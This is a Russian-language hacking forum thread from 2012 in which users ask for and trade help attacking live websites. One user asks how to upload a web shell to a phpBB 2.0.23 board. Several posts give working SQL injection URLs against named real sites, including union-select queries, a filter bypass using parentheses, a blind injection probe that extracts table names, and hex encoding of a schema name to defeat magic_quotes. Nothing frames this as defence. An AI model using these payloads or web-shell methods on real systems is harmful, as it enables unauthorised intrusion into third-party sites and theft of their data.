HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #20741  
Старый 30.05.2012, 00:37
qaz
Guest
Сообщений: n/a
Провел на форуме:
344922

Репутация: 75
По умолчанию

народ, как залить шел в phpBB 2.0.23??

есть возможность разрешать разширения, сделал разширения php разрешонним, но при заливки php файла пишет ошибку Ошибка закачки: Невозможно закачать вложение в ./images/db_337.php.

чёза бред, как быть?
 
Ответить с цитированием

  #20742  
Старый 30.05.2012, 00:43
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

Цитата:
Сообщение от qaz  
qaz said:
народ, как залить шел в phpBB 2.0.23??
есть возможность разрешать разширения, сделал разширения php разрешонним, но при заливки php файла пишет ошибку Ошибка закачки: Невозможно закачать вложение в ./images/db_337.php.
чёза бред, как быть?
старый добрый метод кто отменял?

грузи через восстановление базы
 
Ответить с цитированием

  #20743  
Старый 30.05.2012, 00:47
qaz
Guest
Сообщений: n/a
Провел на форуме:
344922

Репутация: 75
По умолчанию

Цитата:
Сообщение от Konqi  
Konqi said:
старый добрый метод кто отменял?
грузи через восстановление базы
там, нет встановления базы
 
Ответить с цитированием

  #20744  
Старый 30.05.2012, 14:19
shadowrun
Guest
Сообщений: n/a
Провел на форуме:
183267

Репутация: 84
По умолчанию

Цитата:
Сообщение от None  
http://www.rusmg.ru/php/content.php?id=6721+union+select+1,2,3,4,5,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19+--+
не могу вывести
 
Ответить с цитированием

  #20745  
Старый 30.05.2012, 15:40
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

Цитата:
Сообщение от shadowrun  
shadowrun said:
не могу вывести
крути как блинд

Цитата:
Сообщение от None  
http://www.rusmg.ru/php/content.php?id=6721+and+ascii(mid((select+table_na me+from+information_schema.tables+limit+0,1),1,1)) %3E=67+--+
первую букву я тебе уже нашел "C" - char(67)
 
Ответить с цитированием

  #20746  
Старый 30.05.2012, 21:35
Dr.Strangelove
Новичок
Регистрация: 01.12.2008
Сообщений: 26
Провел на форуме:
143670

Репутация: 10
По умолчанию

http://www.printingmuseum.org/eventdetail.php?id=-74 union select 1,2,3,4,5,6,7,8,9,10,11

фильтрация union. есть какие-то варианты обойти кроме вслепую?
 
Ответить с цитированием

  #20747  
Старый 30.05.2012, 22:25
cat1vo
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме:
11937

Репутация: 0
По умолчанию

Цитата:
Сообщение от Dr.Strangelove  
Dr.Strangelove said:
http://www.printingmuseum.org/eventdetail.php?id=-74 union select 1,2,3,4,5,6,7,8,9,10,11
фильтрация union. есть какие-то варианты обойти кроме вслепую?
Код:
Code:
http://www.printingmuseum.org/eventdetail.php?id=-74+union(select(1),2,3,version(),5,6,7,8,9,10,11)
Вы даже не пытались обойти!
 
Ответить с цитированием

  #20748  
Старый 31.05.2012, 00:55
~d0s~
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме:
691279

Репутация: 55
По умолчанию

Цитата:
Сообщение от shadowrun  
shadowrun said:
не могу вывести
http://www.rusmg.ru/php/content.php?id=6721+and+0+union+select+1,version() ,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1--+

Цитата:
Сообщение от winstrool  
winstrool said:
крути как блинд
Классный совет, хеккер.
 
Ответить с цитированием

  #20749  
Старый 31.05.2012, 13:08
mr_zedox
Guest
Сообщений: n/a
Провел на форуме:
9778

Репутация: 0
По умолчанию

Что не так делаю?

Цитата:
Сообщение от None  
http://www.med-ray.ru/view.php?ID=-195+union+select+1,2,3,4,5,group_concat(table_name ),7,8,9,10,11,12+from+information_schema.tables+wh ere+table_schema=%28medray%29+--+
 
Ответить с цитированием

  #20750  
Старый 31.05.2012, 13:12
Melfis
Guest
Сообщений: n/a
Провел на форуме:
195266

Репутация: 53
По умолчанию

Цитата:
Сообщение от mr_zedox  
mr_zedox said:
Что не так делаю?
в неправильном синтаксисе:

table_schema=(medray)

Вместо скобок тут должны быть кавычки (ну или кавычкни внутри скобок, в любом случае стринговый параметр надо обрамлять ими), а т.к. mq=on, то надо переводить в хекс имя бд medray (в нех формате кавычки не нужны)

table_schema=0x6d6564726179

или для примера

table_schema=(0x6d6564726179)
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ